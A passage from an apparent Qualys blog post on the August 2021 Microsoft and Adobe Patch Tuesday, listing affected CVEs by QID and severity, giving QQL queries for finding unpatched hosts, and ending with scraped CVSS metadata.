Qualys QIDs Providing Coverage\n\n**QID**| **Title**| **Severity**| **CVE ID** \n---|---|---|--- \n110388| Microsoft SharePoint Enterprise Server Multiple Vulnerabilities August 2021| Medium| [_CVE-2021-36940_](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-36940>) \n110389| Microsoft Office and Microsoft Office Services and Web Apps Security Update August 2021 | High| [_CVE-2021-34478_](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-34478>), [_CVE-2021-36941_](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-36941>) \n375798| Microsoft Azure CycleCloud Elevation of Privilege Vulnerability August 2021 | Medium| [_CVE-2021-33762_](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-33762>), [_CVE-2021-36943_](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-36943>), [_KB3142345_](<https://www.microsoft.com/en-us/download/details.aspx?id=103313>) \n91801| Microsoft Dynamics Business Central Cross-Site (XSS) Scripting Vulnerability August 2021 | Medium | [_CVE-2021-36946_](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-36946>) \n91802| Microsoft Windows Security Update for August 2021 \n \n | High| CVE-2021-26424, [_CVE-2021-26425_](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-26425>), [_CVE-2021-26426_](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-26426>), [_CVE-2021-26431_](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-26431>), [_CVE-2021-26432_](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-26432>), [_CVE-2021-26433_](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-26433>), [_CVE-2021-34480_](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-34480>), [_CVE-2021-34483_](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-34483>), [_CVE-2021-34484_](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-34484>), [_CVE-2021-34486_](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-34486>), [_CVE-2021-34487_](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-34487>), [_CVE-2021-34530_](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-34530>), [_CVE-2021-34533_](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-34533>), [_CVE-2021-34534_](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-34534>), [_CVE-2021-34535_](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-34535>), [_CVE-2021-34536_](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-34536>), [_CVE-2021-34537_](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-34537>), [_CVE-2021-36926_](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-36926>), [_CVE-2021-36927_](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-36927>), [_CVE-2021-36932_](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-36932>), [_CVE-2021-36933_](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-36933>), [_CVE-2021-36936_](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-36936>), [_CVE-2021-36937_](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-36937>), [_CVE-2021-36938_](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-36938>), [_CVE-2021-36947_](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-36947>), [_CVE-2021-36948_](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-36948>) \n91803| Microsoft Windows Local Security Authority (LSA) Spoofing Vulnerability August 2021 | High| [_CVE-2021-36942_](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-36942>) \n91804| Microsoft Windows Defender Elevation of Privilege Vulnerability August 2021 | Medium| [_CVE-2021-34471_](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-34471>) \n91805| Microsoft Windows 10 Update Assistant Elevation of Privilege Vulnerability August 2021 | Medium | [_CVE-2021-36945_](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-36945>) \n91806| Microsoft Azure Active Directory Connect Authentication Bypass Vulnerability August 2021 | Medium| [_CVE-2021-36949_](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-36949>) \n91774| Microsoft .NET Core and ASP.NET Core Security Update for August 2021 | High| [_CVE-2021-26423_](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-26423>), [_CVE-2021-34485_](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-34485>), [_CVE-2021-34532_](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-34532>) \n91809| Microsoft Visual Studio Security Update for August 2021 | Medium| [_CVE-2021-26423_](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-26423>), [_CVE-2021-34485_](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-34485>), [_CVE-2021-34532_](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-34532>) \n \n### Adobe Patch Tuesday \u2013 August 2021\n\nAdobe addressed 29 CVEs this Patch Tuesday impacting Adobe Connect and Magento product. The patches for Magento are labeled as [Priority 2](<https://helpx.adobe.com/security/severity-ratings.html>), while the remaining patches are set to [Priority 3](<https://helpx.adobe.com/security/severity-ratings.html>).\n\n**Adobe Security Bulletin**| **QID**| **Severity**| **CVE ID** \n---|---|---|--- \nAdobe Connect Multiple Vulnerabilities (APSB21-66) | 730152| Medium| [CVE-2021-36061](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-36061>), [CVE-2021-36062](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-36062>), [CVE-2021-36063](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-36063>) \n \n### Discover Patch Tuesday Vulnerabilities in VMDR\n\nQualys VMDR automatically detects new Patch Tuesday vulnerabilities using continuous updates to its Knowledge Base (KB).\n\nYou can see all your impacted hosts by these vulnerabilities using the following QQL query:\n\n`vulnerabilities.vulnerability:(qid:`91774` OR qid:`91801` OR qid:`91802` OR qid:`91803` OR qid:`91804` OR qid:`91805` OR qid:`91806` OR qid:`91809` OR qid:`375798` OR qid:`110389` OR qid:`110388` OR qid:`730152`)`\n\n![](https://blog.qualys.com/wp-content/uploads/2021/08/Picture1-1070x618.png)\n\n### Respond by Patching\n\nVMDR rapidly remediates Windows hosts by deploying the most relevant and applicable per-technology version patches. You can simply select respective QIDs in the Patch Catalog and filter on the \u201cMissing\u201d patches to identify and deploy the applicable, available patches in one go.\n\nThe following QQL will return the missing patches pertaining to this Patch Tuesday.\n\n`(qid:`91774` OR qid:`91801` OR qid:`91802` OR qid:`91803` OR qid:`91804` OR qid:`91805` OR qid:`91806` OR qid:`91809` OR qid:`375798` OR qid:`110389` OR qid:`110388` OR qid:`730152`)`\n\n![](https://blog.qualys.com/wp-content/uploads/2021/08/Picture2-1070x585.png)\n\n### Patch Tuesday Dashboard\n\nThe current updated Patch Tuesday dashboards are available in [Dashboard Toolbox: 2021 Patch Tuesday Dashboard](<https://success.qualys.com/discussions/s/article/000006505>).\n\n### Webinar Series: This Month in Vulnerabilities and Patches\n\nTo help customers leverage the seamless integration between Qualys VMDR and Patch Management and reduce the median time to remediate critical vulnerabilities, the Qualys Research team is hosting a monthly webinar series [_This Month in Vulnerabilities and Patches_](<https://www.brighttalk.com/webcast/11673/502309>).\n\nWe discuss some of the key vulnerabilities disclosed in the past month and how to patch them:\n\n * Microsoft Patch Tuesday, August 2021\n * Adobe Patch Tuesday, August 2021\n\n[Join us live or watch on demand!](<https://www.brighttalk.com/webcast/11673/502309>)\n\n![](https://blog.qualys.com/wp-content/uploads/2021/07/This-Month-in-Vulnerabilities-and-Patches-Webinar-Desktop-1070x465.png)[Webinar August 12, 2021 or on demand](<https://www.brighttalk.com/webcast/11673/502309>).\n\n### About Patch Tuesday\n\nPatch Tuesday QIDs are published at [Security Alerts](<https://www.qualys.com/research/security-alerts/>), typically late in the evening of [Patch Tuesday](<https://blog.qualys.com/tag/patch-tuesday>), followed shortly after by [PT dashboards](<https://qualys-secure.force.com/discussions/s/article/000006505>).", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 7.8, "privilegesRequired": "LOW", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2021-08-10T19:58:49", "type": "qualysblog", "title": "Microsoft and Adobe Patch Tuesday (August 2021) \u2013 Microsoft 51 Vulnerabilities with 7 Critical, Adobe 29 Vulnerabilities", "bulletinFamily": "blog", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 4.6, "vectorString": "AV:L/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-26423", "CVE-2021-26424", "CVE-2021-26425", "CVE-2021-26426", "CVE-2021-26431", "CVE-2021-26432", "CVE-2021-26433", "CVE-2021-33762", "CVE-2021-34471", "CVE-2021-34478", "CVE-2021-34480", "CVE-2021-34481", "CVE-2021-34483", "CVE-2021-34484", "CVE-2021-34485", "CVE-2021-34486", "CVE-2021-34487", "CVE-2021-34530", "CVE-2021-34532", "CVE-2021-34533", "CVE-2021-34534", "CVE-2021-34535", "CVE-2021-34536", "CVE-2021-34537", "CVE-2021-36061", "CVE-2021-36062", "CVE-2021-36063", "CVE-2021-36926", "CVE-2021-36927", "CVE-2021-36932", "CVE-2021-36933", "CVE-2021-36936", "CVE-2021-36937", "CVE-2021-36938", "CVE-2021-36940", "CVE-2021-36941", "CVE-2021-36942", "CVE-2021-36943", "CVE-2021-36945", "CVE-2021-36946", "CVE-2021-36947", "CVE-2021-36948", "CVE-2021-36949"], "modified": "2021-08-10T19:58:49", "id": "QUALYSBLOG:0F0ACCA731E84F3B1067935E483FC950", "href": "https://blog.qualys.com/category/vulnerabilities-threat-research", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}]}